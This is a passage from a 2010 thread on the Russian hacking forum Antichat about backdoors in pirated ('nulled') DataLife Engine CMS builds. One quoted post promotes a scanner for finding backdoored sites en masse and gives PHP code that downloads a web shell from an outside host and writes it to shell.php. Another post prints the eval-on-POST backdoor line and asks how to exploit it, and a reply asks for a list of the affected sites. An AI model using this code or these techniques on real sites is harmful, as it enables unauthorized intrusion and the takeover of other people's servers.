ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #131  
Старый 11.04.2010, 20:23
sir95
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191

Репутация: 0
По умолчанию

Цитата:
Сообщение от saransko_o  
имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?
Нулл движок?
 
Ответить с цитированием

  #132  
Старый 11.04.2010, 23:56
saransko_o
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607

Репутация: 2
По умолчанию

Цитата:
Сообщение от sir95  
Нулл движок?
да. нулл от MID.
 
Ответить с цитированием

  #133  
Старый 12.04.2010, 05:59
ReckouNT
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738

Репутация: 2
По умолчанию

В нуллах авторы нулла пишут уязвимости. Либо сами нуллите, либо юзайте фривар двиг.
Сам лично юзаю PHP - Fusion.
 
Ответить с цитированием

  #134  
Старый 12.04.2010, 15:06
saransko_o
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607

Репутация: 2
По умолчанию

Кстати на многих лицензия была

Последний раз редактировалось saransko_o; 12.04.2010 в 15:11..
 
Ответить с цитированием

  #135  
Старый 14.04.2010, 12:15
A!m0ff
Новичок
Регистрация: 07.04.2006
Сообщений: 3
Провел на форуме:
19810

Репутация: 1
По умолчанию

Цитата:
Сообщение от Dr.Brain  
Вот софтина сканнер dle сайтов с встроенным бекдором сборки от злого
Нужна база сайтов которых в паблике навалом..

Скачать

В архиве сканнер и кейген для него
Покупал за 15$ , потому выкласть не жалко...
На базе 16000 сайтов нашёл 6 бекдоров
Версия DLE 8.2-8.5
Сканнер можна настроить под любую ссылку бекдора если надо..

Скорость: 2-3 сайта в сек. (1мбит)
Сам бекдор выполняет любой PHP код, потому залить шелл не составит труда

Берём хостинг. Туда текстовик с шеллом вида shell.txt
Идём в бекдор. Пишем
$shell = file_get_contents("http://site/shell.txt");
$fp = fopen("shell.php", a);
fwrite($fp, $shell);
fclose($fp);
А кто автор и как с ним связаться ?
 
Ответить с цитированием

  #136  
Старый 26.04.2010, 01:55
sir95
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191

Репутация: 0
По умолчанию

Такой вопрос, залил шелл.
А как его юзать? Фиг его знает как искать етот шелл.....
 
Ответить с цитированием

  #137  
Старый 26.04.2010, 09:17
Firrst
Новичок
Регистрация: 17.10.2009
Сообщений: 1
Провел на форуме:
24095

Репутация: 0
По умолчанию

Никак, там в папке с загруженными файлами лежит htaccess, ты не выполнишь .php файл
 
Ответить с цитированием

  #138  
Старый 30.04.2010, 05:43
Rew
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188

Репутация: 0
По умолчанию

Есть бедкодер в папке /engine/ajax/

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}

Что с этим можно сделать?

Последний раз редактировалось Rew; 30.04.2010 в 05:46..
 
Ответить с цитированием

  #139  
Старый 30.04.2010, 06:08
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Цитата:
Сообщение от Rew  
Есть бедкодер в папке /engine/ajax/

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}

Что с этим можно сделать?
Ну например, отправить мне в ЛС список сайтов с этим бекдором
 
Ответить с цитированием

  #140  
Старый 30.04.2010, 06:21
Rew
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188

Репутация: 0
По умолчанию

Я думаю таких сайтов много с этим бедкодером это относиться к null версиям dle.

К примеру DataLife Engine v.8.5 Nulled by M.I.D-Team

Так что с этим можно сделать?

В этой папке нету файла .htaccess

Последний раз редактировалось Rew; 30.04.2010 в 06:27..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
Обзор уязвимостей в платных CMS ZAMUT Сценарии/CMF/СMS 56 15.04.2010 21:02
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Форумы 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ